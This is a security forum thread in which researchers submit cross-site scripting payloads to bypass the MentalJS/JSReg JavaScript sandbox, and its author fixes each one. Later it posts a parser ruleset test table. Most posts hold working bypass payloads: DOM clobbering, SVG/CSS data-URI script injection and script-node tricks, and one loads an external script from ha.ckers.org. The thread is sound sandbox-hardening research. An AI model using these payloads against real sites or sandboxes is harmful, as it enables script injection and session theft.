Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213
Current Page: 13 of 13
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 12, 2012 02:44AM

Thanks and fixed. I force a space after some keywords I missed. Luckily these are stupid human mistakes from me and not an attack on the technique.

Also added a semi colon after return, break or continue:
[code.google.com]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/12/2012 05:08AM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 12, 2012 04:39PM

// not an attack on the technique

I agree and I have a very good first impression of the new parser.

1<!--0[0];for(1
function lo(){}/alert(location)/+0<!--0[0];);

01.E+/-0;lo='/+alert(location)//'

07.in/alert(location)/+0

----------------------
~Veritas~



Edited 2 time(s). Last edit at 11/12/2012 06:18PM by LeverOne.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 13, 2012 03:20AM

Ok wow fixed those.

- Rewrote octals because who uses them anyway
- You made me add a function for asi. It's slower but needed to avoid the same mistakes in different places.
- Also fixed the number state machine to return an error with unexpected exponent if one was not included.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 14, 2012 12:21AM

eval("1..lo\u2028in\u2028function\u2028()/'/;alert(location)//'");

old problems...

----------------------
~Veritas~

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 14, 2012 03:41AM

Ugh ack. Two bugs.
1. Spaces character check is invalid range
2. isVariablePart is accepting para/line separarators =)

Update..
Fixed. This was because I copied a regex of valid variables then did a conversion to ranges but either the regex was wrong or my conversion function went wrong. I've redone it using a manual check using eval in the browser to see if they are valid variables. Sorry about this, this was lame. I should have a unit test for variables but I could spend all day creating unit tests for lots of things =) and I don't have time.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/14/2012 05:14AM by Gareth Heyes.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 15, 2012 08:22PM

document.body.innerHTML="<form onmouseover=alert(1)><input name=attributes>";

Opera

document.body.innerHTML="<svg><image></image><style>image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>";


IE9 (element.attributes.length changes in the rewrite)

document.body.innerHTML="<img style=l:o onerror=alert(location) src=>";

----------------------
~Veritas~



Edited 2 time(s). Last edit at 11/16/2012 03:50AM by LeverOne.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 16, 2012 05:31AM

Thanks and fixed. I've changed how I remove attributes and fixed a couple of things with the ASI.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Date: November 19, 2012 05:57PM

Found two bugs in the fix for the previous bug:
Quote

for (j= element.attributes.length; --j>0;)
element.removeAttributeNode(element.attributes[ i]);
First bug is in the loop control. Should be either j-->0 or --j>=0.

Currently you don't check the first attribute:
document.body.innerHTML='<input onblur="alert(1)">'


The second bug is in the same piece of code. You made a mistake using i instead of j when removing attributes. Should be element.attributes[j] or elements.attributes[0], otherwise some really strange things happen:

document.body.innerHTML='<div><input onblur="alert(/chrome/)" b="" onblur="alert(/FF/IE/)">'

or worse:

document.body.innerHTML='<x><y><z a="" b="">'

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 11/19/2012 06:44PM by Jonas Magazinius.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: November 19, 2012 08:53PM

document.body.innerHTML="<svg><image></image><style></style></svg>";
document.getElementsByTagName('style')[1].textContent='image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}';

A similar can be done via innerText + -o-link

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: November 20, 2012 03:19AM

As always thanks and thanks for pointing out my stupid mistakes. For the moment I've disabled innerText/textContent on style. I check the tagName inside the setter so if you can set tagName to something else then you can bypass it but it appears that it is read only in the browser. I will add CSS parsing insider the setter later.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: LeverOne
Date: November 22, 2012 12:33AM

1) IE 9
document.body.innerHTML='<lo xmlns="><img src=x:xx onerror=alert(location)//"></lo>';

2) (repetition)
document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>";

3) Opera
document.body.innerHTML="<svg><image></image><style><!-- or any other elements -->image{filter:url('data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E')}</style></svg>";


4)
for(var lo=lo in lo,lo
/alert(location));'/)'//'

5) Opera
document.body.innerHTML="<svg><image></image><style></style></svg>";
document.getElementsByTagName('style')[1].appendChild(document.createTextNode('image{filter:url(\'data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22%3E%3Cscript%3Ealert(top.location)%3C/script%3E%3C/svg%3E\')}'));

6) Opera
document.body.innerHTML='<style></style>';
document.getElementsByTagName('style')[1].innerHTML='*{-o-link:"data:text/html;base64,PGJvZHk+CjxlbWJlZCAgRmxhc2hWYXJzPXVybD1odHRwOi8vYnVzaW5lc3NpbmZvLmNvLnVrJm5hbWU9X1ggc3JjPWh0dHA6Ly9odG1sNXNlY3VyaXR5Lmdvb2dsZWNvZGUuY29tL3N2bi90cnVuay9hdHRhY2htZW50cy90ZXN0LnN3Zj4KPGEgaWQ9X1kgaHJlZj0iamF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIHRhcmdldD1fWD48L2E+CjxzY3JpcHQ+c2V0VGltZW91dCgiZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ19ZJykuY2xpY2soKSIsIDQwMDApOzwvc2NyaXB0Pg==";-o-link-source:current}';

bugs:

1)
element.setAttribute(attrs[j].name, attrs[j].name);

2)

'$constructor$': {configurable: true, get:function(){return location}},

exploitable on IE9
(1,location.constructor)('javascript:alert(document.URL)')

----------------------
~Veritas~



Edited 11 time(s). Last edit at 11/26/2012 12:57AM by LeverOne.

Options: ReplyQuote
Re: MentalJS sandbox challenge
Posted by: Gareth Heyes
Date: November 26, 2012 03:27AM

Wow thanks! I've fixed all those. I'm currently struggling with chrome at the moment, there seems to be a large delay processing the initial js. I might have to make my code smaller and use less calls to charCodeAt.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: November 26, 2012 05:07AM

1)
document.body.innerHTML="<form onmouseover=alert(location) name=body><input>";

2) FF
x=document.createElement('script');
x.innerHTML='{alert(location)}';
x.appendChild(document.createTextNode('+1'));
document.body.appendChild(x);

3) !FF // SVGScriptElement
document.body.innerHTML="<svg><script></script></svg>";
x=document.getElementsByTagName('script')[2].cloneNode();
x.textContent='alert(location)';
document.getElementsByTagName('svg')[0].appendChild(x);

4) $appendChild$ w/o context check

x=document.createElement('script');
x.appendChild(document.createTextNode('1'));
x.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

----------------------
~Veritas~



Edited 4 time(s). Last edit at 11/27/2012 08:15AM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 03, 2013 05:20PM

I'm back after a huge delay :) if you are still interested in the project I've rewritten a lot of the parser to be much faster. I've removed browser syntax verification because chrome is fucked. Here's an exploit using the chrome bug which I fixed:
Function("/*", "*/){},alert(location),function(){")

I can now parse jQuery in 25-50ms :) I've fixed the dom hacks by basically stopping script being used in the dom. I guess I will have to write a whole dom filtering api to sandbox each text node if script etc. If anyone wants to help with that or knows of a better solution I'm all ears since my dom filtering coding isn't great.

Update...
I rewrote the dom side at the moment it allows css without filtering. I use node iterator instead now to parse the innerHTML assignments.

This demo might be more interesting to test since it's sort of a real world example of protecting the dom
http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Ealert%28location%29%3C%2Fscript%3E

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/21/2013 05:57AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 22, 2013 12:53AM

I start looking already at the weekend.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 22, 2013 07:05AM

My parser waits in fear and anticipation of the great lever one mass pwnage.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 26, 2013 01:50PM

FF, IE


document.body.innerHTML='<script> </script>';
x=document.getElementsByTagName('script')[2].cloneNode();
x.appendChild(document.createTextNode('1'));
x.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

bugs:

1) if(this.parentNode) { // parentNode may not exist f.e.: document.createElement('div').innerHTML='<script>1</script>'; <-- parentNode == null
script = document.createElement('script');

2) if(/^[$](?:toString|valueOf|constructor|hasOwnProperty)[$]$/.test(key))

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 27, 2013 03:45AM

Damn. This is tricky. I also need to prevent call/apply too :(

document.body.innerHTML='<script> </script>';
x=document.getElementsByTagName('script')[2].cloneNode();
document.body.appendChild.call(x,document.createTextNode('1'));
document.body.appendChild.call(x,document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

I need to do the sandbox step just before the script is executed. Maybe checking the appendChild node type as it's being added to the document is better. Thanks as always!

Update...
The fix is to sandbox script as it's appended by creating a new node when appendChild is called. [code.google.com]

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/27/2013 04:11AM by Gareth Heyes.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 29, 2013 10:00AM

document.body.innerHTML="<form onmouseover=alert(location)><input name=attributes>";
// for the third time :)

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: March 29, 2013 03:27PM

Ack. Ugh. I should have setup some tests. I assummed that since the node wasn't actually html the attributes wouldn't be affected by dom clobbering techniques obviously I was wrong :( I'll have to check it's the real attributes again =)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: April 06, 2013 09:31AM

1) IE,FF
document.body.innerHTML="<script> </script>";
x=document.getElementsByTagName('script')[2].cloneNode();
x.setAttribute('src', 'http://ha.ckers.org/xss.js');
document.body.insertBefore(x,document.body.firstChild);

bugs:

1) "There is no native insertAfter method." // [developer.mozilla.org]

2)
if(!allowedTagsRegEx.test(elementNode.nodeName)) {                                        
 elementNode.parentNode.removeChild(elementNode);
 continue;  // it was unintentionally missed, I guess.
}

================
upd:

2)

f=document.createDocumentFragment();
f.appendChild(document.getElementsByTagName('script')[0].cloneNode());
f.firstChild.appendChild(document.createTextNode('1'));
f.firstChild.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(f);

// almost the same

x=document.createElement('div');
x.appendChild(document.getElementsByTagName('script')[0].cloneNode());
x.firstChild.appendChild(document.createTextNode('1'));
x.firstChild.appendChild(document.createTextNode('/alert(location)/+0'));
document.body.appendChild(x);

=================

createComment method is potentially dangerous when used in the context of uncontrolled innerHTML, but can not be used to MentalJS bypass now.

<div id=x></div>

<script>
document.getElementById('x').appendChild(document.createComment("--><img src=xx:xx onerror=alert(1)//"));
alert(document.getElementById('x').innerHTML);
</script>

----------------------
~Veritas~



Edited 6 time(s). Last edit at 04/24/2013 09:52PM by LeverOne.

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: d0znpp
Date: August 26, 2013 02:32AM

Regards: http://www.modsecurity.org/demo/demo-deny-noescape.html

What about <style> tricks such as
- expression:
- background:url(javascript:...)

No sandboxes there

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: d0znpp
Date: August 26, 2013 08:48AM

For IE also: detachEvent missed

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: September 07, 2013 02:06PM

@d0znpp

MentalJS designed to work in IE9+ standards mode.

----------------------
~Veritas~

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: February 06, 2014 03:09PM

Hey I've finally managed to do some fixes, fixed that damn attribute attack and the others. Can you break it?? Also do you think the parser itself is unbreakable now? It must be pretty tough to beat now.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: JSReg sandbox challenge
Posted by: LeverOne
Date: March 03, 2014 03:33PM

I'm starting to test the ruleset.
---

Test cases:

[throw,]
[typeof,]
[var i,]

            0: {         // arraycomma 
                0: 1,    // arraycomma   +
                1: 1,    // arr open  +
                2: 1,    // arr close   +
                3: 1,    // AccessorOpen    ?
                4: 1,    //  AccessorClose   +
                14: 1,   //  Break    ?
                15: 1,   //  Case      ?
                17: 1,   //  Delete    ?
                28: 1,   //  Comma      ?
                29: 1,   //  Continue    ?
                36: 1,   //  False     +
                41: 1,   // ForStatementParenOpen ?
                45: 1,   // ForSemi     ?
                46: 1,   // FunctionCallOpen    ?
                47: 1,   //  FunctionCallClose   +
                63: 1,   //  FunctionExpressionCurlyClose  +
                67: 1,   // Identifier  +
                69: 1,   // IfStatementParenOpen ?
                74: 1,   // Infinity    +
                83: 1,   // NaN    +
                84: 1,    // New   ?
                85: 1,    // Number  +
                86: 1,    // Null  +
                97: 1,    //  ObjectLiteralCurlyClose +
                99: 1,    //  ObjectLiteralColon ?
                104: 1,   //  ParenExpressionOpen  ?
                106: 1,   //  ParenExpressionClose +
                107: 1,   //  PostfixIncrement   +
                108: 1,   //  PostfixDeincrement +
                111: 1,   //  Return   ?
                112: 1,   //  RegExp  +
                115: 1,   //  String +
                119: 1,   //  SwitchStatementParenOpen  ?
                124: 1,   //  This  +
                125: 1,   //  TernaryQuestionMark  ?
                126: 1,   //  TernaryColon  ?
                130: 1,   //  True  +
                131: 1,   //  Throw  ?
                132: 1,   //  Typeof  ?
                135: 1,   //  Undefined  +
                137: 1,   //  VarIdentifier  ?
                138: 1,   //  VarComma  ?
                139: 1,   //  Void   ?
                141: 1,   //  WithStatementParenOpen   ?
                146: 1    //  WhileStatementParenOpen  ?
            },

            1: {                      // ArrayOpen
                ...
                14: 1, // Break  ?
                ...
                20: 1, // DoStatementCurlyClose ?
                ...
                29: 1, // Continue ?
                ...
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                ...
                129: 1, // TryStatementCurlyClose ?
                ...
                138: 1, // VarComma ?
                ...
            },
            2: VALID RULES
            3: {                    // AccessorOpen x[
                ...
                
                137: 1 // VarIdentifier  ?
            },
            4: {                     //  AccessorClose  {}[x]
                ...
                137: 1 // VarIdentifier ?
            },
            5: {                     // Addition   x+

                137: 1 // VarIdentifier ?
            },
            6: {                  // AdditionAssignment  x+=
                137: 1 // VarIdentifier  ?                
            },
            7: {                        //  AssignmentDivide  x/=

                137: 1 // VarIdentifier ?
            },
            8: {                     //  AndAssignment     x&=
                137: 1 // VarIdentifier  ?
            },
            9: {                           // BlockStatementCurlyOpen  x{

                18: 1, // Do  ?
                20: 1, // DoStatementCurlyClose ?
                32: 1, // Else ?
                42: 1, // ForStatementParenClose ?
                70: 1, // IfStatementParenClose ?
                111: 1, // Return ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen  ?
                129: 1, // TryStatementCurlyClose  ?
                142: 1, // WithStatementParenClose  ?
                147: 1, // WhileStatementParenClose ?

            },
            10: {                      //  BlockStatementCurlyClose x}

                18: 1, // Do   ?
                19: 1, // DoStatementCurlyOpen ?
                26: 1, // CatchStatementCurlyOpen ?
                32: 1, // Else ?
                33: 1, // ElseCurlyOpen ?
                38: 1, // FinallyStatementCurlyOpen ?
                42: 1, // ForStatementParenClose ?
                43: 1, // ForStatementCurlyOpen ?
                59: 1, // FunctionExpressionCurlyOpen ?
                61: 1, // FunctionStatementCurlyOpen ?
                70: 1, // IfStatementParenClose ?
                71: 1, // IfStatementCurlyOpen  ?
                76: 1, // LabelColon ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                123: 1, // SwitchColon ?
                128: 1, // TryStatementCurlyOpen ?
                142: 1, // WithStatementParenClose ?
                143: 1, // WithStatementCurlyOpen ?
                147: 1, // WhileStatementParenClose ?
                148: 1, // WhileStatementCurlyOpen ?
            },
            11: {                       // BitwiseNot  x~
                14: 1, // Break ?
                20: 1, // DoStatementCurlyClose ?
                29: 1, // Continue ?
                84: 1, // New  ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                138: 1, // VarComma  ?

            },
            12: {                              //    BitwiseOr  x|

                137: 1 // VarIdentifier  ?
            },
            13: {                    // BitwiseAnd  x&

                137: 1 // VarIdentifier     ?
            },
            14: {                               //  x break

                20: 1, // DoStatementCurlyClose ?
                111: 1, // Return ?
                120: 1, // SwitchStatementParenClose  ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
            },
            15: {          // Case                   x case
                   // All the rules are valid, but they are not enough.
            },
            16: {          //   Default   x default
                   // All the rules are valid, but they are not enough.
            },
            17: {   //  Delete        x delete

                14: 1, // Break   ?
                20: 1, // DoStatementCurlyClose ?
                29: 1, // Continue ?
                84: 1, // New   ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose  ?
                138: 1, // VarComma ?

            },
            18: {                  //  Do   x do
   
                20: 1, // DoStatementCurlyClose  ?

                111: 1, // Return  ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen  ?
                129: 1, // TryStatementCurlyClose  ?

            },
            19: {         // DoStatementCurlyOpen
                // VALID RULES
            },
            20: {        //  DoStatementCurlyClose  x}
                   copy from 10
                 ++ 19: 1, // DoStatementCurlyOpen
                 -- 9: 1, // BlockStatementCurlyOpen

            },
            21: {           //DivideOperator      x/  
                  copy from 5

            },
            22-26: VALID RULES
            27: {          //  CatchStatementCurlyClose x}
                  copy from 10
                  ++ 26: 1, // CatchStatementCurlyOpen
                  -- 9: 1, // BlockStatementCurlyOpen
            },
            28: {          //   Comma    x,

                137: 1 // VarIdentifier   ?
            },
            29: {         //  Continue     x continue  
                 copy from 14
            },
            30: {                //  EqualAssignment        x=      
                 VALID RULES
            },
            31: {                   //    Equal        x==     
                 copy from 5

            },
            32: {           // Else   x else
                9: 1, // BlockStatementCurlyOpen ?
                18: 1, // Do ?
                19: 1, // DoStatementCurlyOpen ?
                20: 1, // DoStatementCurlyClose  ?
                26: 1, // CatchStatementCurlyOpen ?
                32: 1, // Else ?
                33: 1, // ElseCurlyOpen  ?
                38: 1, // FinallyStatementCurlyOpen  ?
                42: 1, // ForStatementParenClose ?
                43: 1, // ForStatementCurlyOpen ?
                59: 1, // FunctionExpressionCurlyOpen ?
                61: 1, // FunctionStatementCurlyOpen ?
                70: 1, // IfStatementParenClose  ?
                71: 1, // IfStatementCurlyOpen ?
                76: 1, // LabelColon  ?
                89: 1, // Nothing  ?
                111: 1, // Return  ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                123: 1, // SwitchColon ?
                128: 1, // TryStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                142: 1, // WithStatementParenClose ?
                143: 1, // WithStatementCurlyOpen ?
                147: 1, // WhileStatementParenClose ?
                148: 1, // WhileStatementCurlyOpen ?

            },
            33: {   //   ElseCurlyOpen            else{
                 VALID RULES      
            },
            34: {           // ElseCurlyClose   x}      
                   copy from 10
                   ++  33: 1, // ElseCurlyOpen
                   --  9: 1, // BlockStatementCurlyOpen

            },
            35: {          //   EndStatement    x;     

                20: 1, // DoStatementCurlyClose ?
                120: 1, // SwitchStatementParenClose  ?
                121: 1, // SwitchStatementCurlyOpen ?

            },
            36: {             //   False        x false

                14: 1, // Break ?
                29: 1, // Continue ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?             
                138: 1, // VarComma ?

            },
            37: {          //   FinallyStatement      x finally
                VALID RULES
            },
            38: {         //  FinallyStatementCurlyOpen
                VALID RULES
            },
            39: {         //   FinallyStatementCurlyClose   x}  
                  copy from 10
                  ++ 38: 1, // FinallyStatementCurlyOpen
                  -- 9: 1, // BlockStatementCurlyOpen

            },
            40: {  //  ForStatement   x for   
                  copy from 18

            },
            41: {   //    ForStatementParenOpen
                  VALID RULES
            },
            42: {     //  ForStatementParenClose   x)

                14: 1, // Break  ?
                29: 1, // Continue ?
 
            },
            43: {       //  ForStatementCurlyOpen     x{
                 VALID RULES
            },
            44: {        //  ForStatementCurlyClose  
                 copy from 10
                 ++ 43: 1, // ForStatementCurlyOpen
                 -- 9: 1, // BlockStatementCurlyOpen
           

            },
            45: {                 //  ForSemi    for(x;x;)
                
                137: 1 // VarIdentifier + ?  // for(var YES;var NO;)  
            },
            46: {         //   FunctionCallOpen   x(
                 VALID RULES
            },
            47: {      // FunctionCallClose  x)

                137: 1 // VarIdentifier  ?
            },
            48-51: VALID RULES
            },
            52: {        //   FunctionExpression            x function

                14: 1, // Break ?
                29: 1, // Continue  ?
                138: 1, // VarComma ?

            },
            53-59: VALID RULES
            60: {           //  FunctionStatement    x function

                20: 1, // DoStatementCurlyClose ?
                111: 1, // Return ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?

            },
            61: VALID RULES
            62: {          // FunctionStatementCurlyClose  x}  
                 copy from 10
                 -- 9: 1, // BlockStatementCurlyOpen
                 ++ 61: 1 // FunctionStatementCurlyOpen

            },
            63: {                //    FunctionExpressionCurlyClose   
                 copy from 10
                 -- 9: 1, // BlockStatementCurlyOpen
                 ++ 59: 1 // FunctionExpressionCurlyOpen

            },
            64: {           //  GreaterThan   x>      
                 copy from 5

            },
            65: {              //    GreaterThanEqual   x>=    
                 copy from 5

            },
            66: {           //   IdentifierDot       x.

                137: 1 // VarIdentifier  ?
            },
            67: {          //  Identifier  x i

                20: 1, // DoStatementCurlyClose ?
                120: 1, // SwitchStatementParenClose  ?
                121: 1, // SwitchStatementCurlyOpen  ?
                129: 1, // TryStatementCurlyClose   ?
                138: 1, // VarComma    ?

            },
            68: {           //  IfStatement  x if    
                 copy from 18
            },
            69: VALID RULES
            70: {           //  IfStatementParenClose  x)    copy from 42

                137: 1 // VarIdentifier  ?
            },
            71: VALID RULES
            72: {         //    IfStatementCurlyClose  
                 copy from 10
            },
            73: VALID RULES
            74: {                       //  x Infinity    
                 copy from  36

            },
            75: {                     //      InstanceOf   x instanceof

                137: 1 // VarIdentifier    ?
            },
            76: {          //  LabelColon   x:
                2: 1, // ArrayClose ?
                4: 1, // AccessorClose ?
                36: 1, // False ?
                47: 1, // FunctionCallClose  ?
                63: 1, // FunctionExpressionCurlyClose ?
                74: 1, // Infinity ?
                83: 1, // NaN  ?
                85: 1, // Number  ?
                86: 1, // Null ?
                97: 1, // ObjectLiteralCurlyClose  ?
                106: 1, // ParenExpressionClose  ?
                112: 1, // RegExp ?
                115: 1, // String ?
                124: 1, // This ?
                130: 1, // True ?
                135: 1, // Undefined  ?
                137: 1 // VarIdentifier ?
            },
            77: {           //   LessThan   x<   
                  copy from  12

            },
            78: {             //    LessThanEqual  x<=   
                  copy from  12

            },
            79: {           //   LeftShift   x<<    
                    copy from  12

            },
            80: {            // LeftShiftAssignment   x<<=  
                   copy from 6

            },
            81: {             //  LogicalOr   x|| 
                   copy from 5

            },
            82: {        //  LogicalAnd    x&&   
                   copy from 5
            },
            83: {         //   x NaN     
                   copy from  36
            },
            84: {         //     New     x new
                14: 1, // Break   ?
                20: 1, // DoStatementCurlyClose  ?
                29: 1, // Continue  ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                138: 1, // VarComma   ?

            },
            85: {      //    Number            x 1  
                  copy from 84

            },
            86: {           //   Null     
                 copy from 36
            },
            87: {     //    NotEqual   
                  copy from 5
            },
            88: {   //  Not   
                 copy from 11
            },
            89: VALID RULES
            90: {        // Minus   
                 copy from 5

            },
            91: {          // MinusAssignment  
                 copy from 6

            },
            92: {       //  Modulus    
                  copy from 5

            },
            93: {        //  ModulusAssignment   
                  copy from 6
            },
            94: {         //  Multiply   
                 copy from 5

            },
            95: {         //  MultiplyAssignment  
                 copy from 6 

            },
            96: {         //  ObjectLiteralCurlyOpen  x{   
                 copy from 52

            },
            97: {        //  ObjectLiteralCurlyClose  x}

                9: 1, // BlockStatementCurlyOpen ?
                10: 1, // BlockStatementCurlyClose  ?
                18: 1, // Do  ?
                19: 1, // DoStatementCurlyOpen ?
                20: 1, // DoStatementCurlyClose ?
                26: 1, // CatchStatementCurlyOpen ?
                27: 1, // CatchStatementCurlyClose  ?
                32: 1, // Else ?
                33: 1, // ElseCurlyOpen  ?
                34: 1, // ElseCurlyClose ?
                35: 1, // EndStatement ?
                38: 1, // FinallyStatementCurlyOpen ?
                39: 1, // FinallyStatementCurlyClose ?
                42: 1, // ForStatementParenClose ?
                43: 1, // ForStatementCurlyOpen ?
                44: 1, // ForStatementCurlyClose ?
                59: 1, // FunctionExpressionCurlyOpen ?
                61: 1, // FunctionStatementCurlyOpen ?
                62: 1, // FunctionStatementCurlyClose ?
                70: 1, // IfStatementParenClose ?
                71: 1, // IfStatementCurlyOpen  ?
                72: 1, // IfStatementCurlyClose  ?
                76: 1, // LabelColon ?
                89: 1, // Nothing  ?
                111: 1, // Return   ?
                120: 1, // SwitchStatementParenClose  ?
                121: 1, // SwitchStatementCurlyOpen  ?
                122: 1, // SwitchStatementCurlyClose  ?
                123: 1, // SwitchColon ?
                128: 1, // TryStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                137: 1, // VarIdentifier ?
                142: 1, // WithStatementParenClose ?
                143: 1, // WithStatementCurlyOpen ?
                144: 1, // WithStatementCurlyClose ?
                147: 1, // WhileStatementParenClose  ?
                148: 1, // WhileStatementCurlyOpen  ?
                149: 1 // WhileStatementCurlyClose  ?
            },
            98-99: VALID RULES
            100: {         //   ObjectLiteralComma  x,
                  copy from 28
            },
            101-102: VALID RULES,
            103: {         //   OrAssignment     x|=     
                 copy from 6

            },
            104: {       //   ParenExpressionOpen    x(

                14: 1, // Break     ?
                20: 1, // DoStatementCurlyClose  ?
                29: 1, // Continue ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                138: 1, // VarComma ?

            },
            105: {        // ParenExpressionComma     
                  copy from 28

            },
            106: {         //  ParenExpressionClose   x)  
                  copy from 4

            },
            107: {       //  PostfixIncrement    x++

                137: 1 // VarIdentifier  ?
            },
            108: {       //   PostfixDeincrement

                137: 1 // VarIdentifier ?
            },
            109: {        //   PrefixDeincrement    x ++y
                14: 1, // Break  ?
                20: 1, // DoStatementCurlyClose ?
                29: 1, // Continue  ?
                84: 1, // New    ?
                120: 1, // SwitchStatementParenClose ?
                121: 1, // SwitchStatementCurlyOpen ?
                129: 1, // TryStatementCurlyClose ?
                138: 1, // VarComma  ?

            },
            110: {          //  PrefixIncrement   
                   copy from 109

            },
            111: {         //  Return      x return

                20: 1, // DoStatementCurlyClose ?
